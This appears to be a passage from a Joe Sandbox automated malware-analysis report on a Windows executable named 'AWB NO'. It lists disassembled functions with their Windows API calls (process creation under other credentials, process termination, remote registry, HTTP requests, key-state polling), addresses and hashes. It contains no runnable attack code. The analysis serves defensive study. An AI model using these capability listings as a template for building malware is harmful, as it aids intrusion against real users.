                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00477422
                                                                • Part of subcall function 004654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E
                                                              • GetCursorPos.USER32(?), ref: 0047744E
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004774AC
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              APIs
                                                                • Part of subcall function 004585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00458608
                                                                • Part of subcall function 004585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00458612
                                                                • Part of subcall function 004585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00458621
                                                                • Part of subcall function 004585F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00458628
                                                                • Part of subcall function 004585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0045863E
                                                              • GetLengthSid.ADVAPI32(?,00000000,00458977), ref: 00458DAC
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00458DB8
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00458DBF
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00458DD8
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00458977), ref: 00458DEC
                                                              • HeapFree.KERNEL32(00000000), ref: 00458DF3
                                                              Similarity
                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                              • String ID:
                                                              • API String ID: 3008561057-0
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00458B2A
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00458B31
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00458B40
                                                              • CloseHandle.KERNEL32(00000004), ref: 00458B4B
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458B7A
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458B8E
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              APIs
                                                                • Part of subcall function 004012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                • Part of subcall function 004012F3: BeginPath.GDI32(?), ref: 00401373
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040139C
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0048C1C4
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0048C1D8
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0048C1E6
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0048C1F6
                                                              • EndPath.GDI32(00000000), ref: 0048C206
                                                              • StrokePath.GDI32(00000000), ref: 0048C216
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004203D3
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 004203DB
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004203E6
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004203F1
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004203F9
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00420401
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0046569B
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004656B1
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 004656C0
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004656CF
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004656D9
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004656E0
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 004674E5
                                                              • EnterCriticalSection.KERNEL32(?,?,00411044,?,?), ref: 004674F6
                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00411044,?,?), ref: 00467503
                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00411044,?,?), ref: 00467510
                                                                • Part of subcall function 00466ED7: CloseHandle.KERNEL32(00000000,?,0046751D,?,00411044,?,?), ref: 00466EE1
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467523
                                                              • LeaveCriticalSection.KERNEL32(?,?,00411044,?,?), ref: 0046752A
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00458E7F
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00458E8B
                                                              • CloseHandle.KERNEL32(?), ref: 00458E94
                                                              • CloseHandle.KERNEL32(?), ref: 00458E9C
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00458EA5
                                                              • HeapFree.KERNEL32(00000000), ref: 00458EAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              APIs
                                                                • Part of subcall function 00457652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?,?,0045799D), ref: 0045766F
                                                                • Part of subcall function 00457652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 0045768A
                                                                • Part of subcall function 00457652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 00457698
                                                                • Part of subcall function 00457652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?), ref: 004576A8
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479B1B
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479C97
                                                              • CoTaskMemFree.OLE32(?), ref: 00479CA2
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 00479CF0
                                                              Similarity
                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 4175897753-2785691316
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00478928
                                                              • CharUpperBuffW.USER32(?,?), ref: 00478A37
                                                              • VariantClear.OLEAUT32(?), ref: 00478BAF
                                                                • Part of subcall function 00467804: VariantInit.OLEAUT32(00000000), ref: 00467844
                                                                • Part of subcall function 00467804: VariantCopy.OLEAUT32(00000000,?), ref: 0046784D
                                                                • Part of subcall function 00467804: VariantClear.OLEAUT32(00000000), ref: 00467859
                                                              Strings
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004875C0
                                                              • IsMenu.USER32(?), ref: 004875D8
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00487620
                                                              • DrawMenuBar.USER32 ref: 00487633
                                                              Strings
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert
                                                              • String ID: 0
                                                              • API String ID: 3076010158-4108050209
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047DAD9
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004593F6
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00459409
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00459439
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 787153527-1403004172
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00471B40
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471B66
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00471B96
                                                              • InternetCloseHandle.WININET(00000000), ref: 00471BDD
                                                                • Part of subcall function 00472777: GetLastError.KERNEL32(?,?,00471B0B,00000000,00000000,00000001), ref: 0047278C
                                                                • Part of subcall function 00472777: SetEvent.KERNEL32(?,?,00471B0B,00000000,00000000,00000001), ref: 004727A1
                                                              Strings
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              APIs
                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004866D0
                                                              • LoadLibraryW.KERNEL32(?), ref: 004866D7
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004866EC
                                                              • DestroyWindow.USER32(?), ref: 004866F4
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 0046705E
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00467091
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 004670A3
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004670DD
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0046712B
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0046715D
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0046716E
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004671A8
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00462048
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000000,004BC050,7FFFFFFF,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0043AF92
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B00C
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B087
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B0A0
                                                                • Part of subcall function 0042594C: RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00421013,?), ref: 0042598F
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B11D
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                              • String ID:
                                                              • API String ID: 1443698708-0
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476F14
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476F35
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476F48
                                                              • inet_ntoa.WSOCK32(?), ref: 00476FBB
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00476FFE
                                                              Similarity
                                                              • API ID: ErrorLasthtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 2227131780-0
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EF1B
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EF4B
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047F07E
                                                              • CloseHandle.KERNEL32(?), ref: 0047F0FF
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0045F3F7
                                                              • VariantClear.OLEAUT32(00000013), ref: 0045F469
                                                              • VariantClear.OLEAUT32(00000000), ref: 0045F4C4
                                                              • VariantClear.OLEAUT32(?), ref: 0045F53B
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F569
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              APIs
                                                                • Part of subcall function 004810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480388
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004803C7
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0048040E
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0048043A
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480447
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DC3B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0047DCBE
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047DCDA
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0047DD1B
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DD35
                                                                • Part of subcall function 00405B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467B20,?,?,00000000), ref: 00405B8C
                                                                • Part of subcall function 00405B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467B20,?,?,00000000,?,?), ref: 00405BB0
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                              • String ID:
                                                              • API String ID: 666041331-0
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462792
                                                              • IsMenu.USER32(00000000), ref: 004627B2
                                                              • CreatePopupMenu.USER32 ref: 004627E6
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00462844
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462875
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                              • String ID:
                                                              • API String ID: 93392585-0
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E88A
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E8B3
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E8F2
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E917
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E91F
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String
                                                              • String ID:
                                                              • API String ID: 2832842796-0
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00402357
                                                              • ScreenToClient.USER32(004C67B0,?), ref: 00402374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0045695D
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 004569A9
                                                              • TranslateMessage.USER32(?), ref: 004569D2
                                                              • DispatchMessageW.USER32(?), ref: 004569DC
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004569EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
                                                              • Opcode ID: 78944cadfa5f658e5d3a29197c4c53d74067a31d2e738c011e6355e338db77b1
                                                              • Instruction ID: d2d2e048b48428a59b764f729d5fd62b0118f84c124f9056e951ba18ffc78b82
                                                              • Opcode Fuzzy Hash: 78944cadfa5f658e5d3a29197c4c53d74067a31d2e738c011e6355e338db77b1
                                                              • Instruction Fuzzy Hash: B03109715041029ADB60DF74CC44FB7BBACAB05306F52857BEC11D3162D738984ED798
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00458F12
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00458FBC
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458FC4
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00458FD2
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458FDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                              • Instruction ID: f3feba45afbb173b7df5408e217b9ce9224db61ab9081f89c3f31a24f6b31fdf
                                                              • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                              • Instruction Fuzzy Hash: 9531DF72500219EBDB00CF68D94CA9E7BB6EB48316F10422EFD25E62D1CBB49918CB95
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048B44C
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B471
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B489
                                                              • GetSystemMetrics.USER32(00000004), ref: 0048B4B2
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00471184,00000000), ref: 0048B4D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: 3791213dd528cec4b325057b62e4416410566fbdb7feea0c1a07f810ca373461
                                                              • Instruction ID: 4d453164610f07825c255fc9dd53b5462fd2bb911a73659e8130ccaca7f2bf79
                                                              • Opcode Fuzzy Hash: 3791213dd528cec4b325057b62e4416410566fbdb7feea0c1a07f810ca373461
                                                              • Instruction Fuzzy Hash: B1219131510215AFCB10AF388C05A6E3BA4FB05B24F158F3AF926D22E2E7349811DB98
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,00000000,00000000,?,?,00422EA5,0043B80A,004BBB50), ref: 00422EDB
                                                              • DecodePointer.KERNEL32(?,?,00422EA5,0043B80A,004BBB50), ref: 00422EE6
                                                              • EncodePointer.KERNEL32(00000000,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F4D
                                                              • EncodePointer.KERNEL32(0043B80A,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F5B
                                                              • EncodePointer.KERNEL32(00000004,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pointer$Encode$Decode
                                                              • String ID:
                                                              • API String ID: 1898114064-0
                                                              • Opcode ID: 6cba4af9be9bd637e00d4dc24e1ed588dc77bab247c401d428b928d73a6e6ed4
                                                              • Instruction ID: 2bba0eaa511302fafcc1f6b65b825d62949ed2e19aaa1556a5c5e55d1e537fcd
                                                              • Opcode Fuzzy Hash: 6cba4af9be9bd637e00d4dc24e1ed588dc77bab247c401d428b928d73a6e6ed4
                                                              • Instruction Fuzzy Hash: 5F117272710225AF9B10DB34EF848AABBF9EB05350791457BE805D3210EB75EC049B98
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                              • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                              • BeginPath.GDI32(?), ref: 00401373
                                                              • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: d4d4c8074a2dddb84468a25ad0c171745cbd4a4b28271cbc8231a5ff8f861484
                                                              • Instruction ID: 01809ca1199762821c7ccc43aba1927c018ed3358b57c1522327ad2857708082
                                                              • Opcode Fuzzy Hash: d4d4c8074a2dddb84468a25ad0c171745cbd4a4b28271cbc8231a5ff8f861484
                                                              • Instruction Fuzzy Hash: 9B213070801304EFEB11AF65DC04B6A7BB8FB00321F55863BF810A62F0D7799995DBA9
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00458766
                                                              • GetLastError.KERNEL32(?,0045822A,?,?,?), ref: 00458770
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0045822A,?,?,?), ref: 0045877F
                                                              • HeapAlloc.KERNEL32(00000000,?,0045822A,?,?,?), ref: 00458786
                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045879D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                              • Instruction ID: 6cc8d7d5e4e0d4770d63651d33da719a3d54cfafac7baedd574211c687e01efd
                                                              • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
